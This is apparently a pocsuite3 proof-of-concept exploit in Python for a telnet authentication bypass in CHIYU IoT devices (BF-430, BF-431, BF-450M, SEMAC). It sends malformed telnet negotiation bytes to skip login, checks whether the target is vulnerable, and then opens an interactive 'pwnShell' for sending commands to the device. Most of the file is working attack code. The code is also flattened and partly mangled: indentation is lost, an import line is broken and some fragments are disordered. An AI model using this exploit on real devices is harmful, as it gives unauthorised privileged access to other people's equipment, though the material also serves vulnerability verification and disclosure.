from collections import OrderedDict
import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, get_listener_ip, get_listener_port
from pocsuite3.lib.core.interpreter_option \
import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems
from pocsuite3.modules.listener import REVERSE_PAYLOAD
author = 'sirpedrotavares'
createDate = '2021-04-15'
updateDate = '2021-04-15'
references = ['https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks']
appPowerLink = 'https://www.chiyu-tech.com'
appVersion = 'Telnet service (all versions)'
vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
category = POC_CATEGORY.TOOLS.CRACK
protocol = POC_CATEGORY.PROTOCOL.TELENT
An authentication bypass in telnet server from CHIYU Technology Inc devices allows obtaining a privileged
connection with the target device by supplying a specially malformed request.
Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the
telnet authentication process due to an overflow during the negotiation of the telnet protocol.
Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may
force the remote telnet server to believe that the user has already authenticated. Several models
are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
host = self.getg_option("rhost")
port = self.getg_option("rport") or 23
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(10)
connect = s.connect_ex((host, int(port)))
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
aux = s.recv(1024).strip()
if aux != b'\xff\xfe\x01':
aux = s.recv(1024).strip()
if connect == 0 and "sername" not in str(aux):
if b"\xff\xfe\x01" == aux:
result['VerifyInfo'] = {}
result['VerifyInfo']['rhost'] = self.url
return self.parse_attack(result)
result['VerifyInfo'] = {}
return self.parse_attack(None)
return self.parse_attack(None)
return self.parse_attack(None)
host = self.getg_option("rhost")
port = self.getg_option("rport") or 23
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(10)
connect = s.connect_ex((host, int(port)))
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
aux = s.recv(1024).strip()
if aux != b'\xff\xfe\x01':
aux = s.recv(1024).strip()
if connect == 0 and "sername" not in str(aux):
if b"\xff\xfe\x01" == aux:
print("Connected! ;)\ntype: \"help\"\n\n")
cmd = input("(CHIYU pwnShell:) $ ")
s.send(body.encode('utf-8', 'ignore'))
result = s.recv(1024).decode('utf8', 'ignore')
print("[+] CHIYU device not available, try again ... (terminating)")
print(result.strip('CMD>'))
s.send(b.encode('utf-8', 'ignore'))
result = s.recv(1024).decode()
print(result.strip('CMD>'))
output.fail('target is not vulnerable:' + str(e))
except KeyboardInterrupt:
def parse_attack(self, result):
output.fail('target is not vulnerable')